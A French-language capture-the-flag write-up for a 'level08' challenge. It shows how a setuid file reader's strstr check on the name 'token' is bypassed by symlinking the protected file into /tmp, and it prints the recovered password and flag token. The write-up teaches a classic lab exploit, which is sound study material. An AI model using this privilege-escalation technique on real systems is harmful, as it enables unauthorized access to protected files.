51 lines
1.4 KiB
Markdown
51 lines
1.4 KiB
Markdown
Lors de mon arriver sur le level08 je remarque tout de suite que j'ai deux fichier sur mon home
|
|
|
|
```bash
|
|
ls -l
|
|
total 16
|
|
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08
|
|
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
|
|
```
|
|
|
|
Un executable qui malgres mes tentative ne me donne rien de vraiement precis uniquement mais qui semble lire un fichier
|
|
|
|
```bash
|
|
./level08
|
|
./level08 [file to read]
|
|
```
|
|
|
|
Et je tente alors de lire token mais il me met un message d'erreur
|
|
|
|
```bash
|
|
./level08 token
|
|
You may not access 'token'
|
|
```
|
|
|
|
Mais la facon dont est fait le program protege uniquement un fichier qui contien token
|
|
```bash
|
|
ltrace ./level08 token
|
|
__libc_start_main(0x8048554, 2, 0xbffff7f4, 0x80486b0, 0x8048720 <unfinished ...>
|
|
strstr("token", "token") = "token"
|
|
printf("You may not access '%s'\n", "token"You may not access 'token'
|
|
) = 27
|
|
exit(1 <unfinished ...>
|
|
+++ exited (status 1) +++
|
|
```
|
|
|
|
Je decide donc de faire un lien symbolique sur le fichier de token ailleurs (la ou je peux ecrire)
|
|
```bash
|
|
ln -s /home/user/level08/token /tmp/test
|
|
```
|
|
|
|
Et j'obtiens quelque chose qui ressemble a un flag
|
|
```bash
|
|
./level08 /tmp/test
|
|
quif5eloekouj29ke0vouxean
|
|
```
|
|
|
|
qui n'est pas un flag mais le mot de passe pour flag08 auquel je me connect et fait la commande getflag
|
|
|
|
```bash
|
|
getflag
|
|
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f
|
|
```
|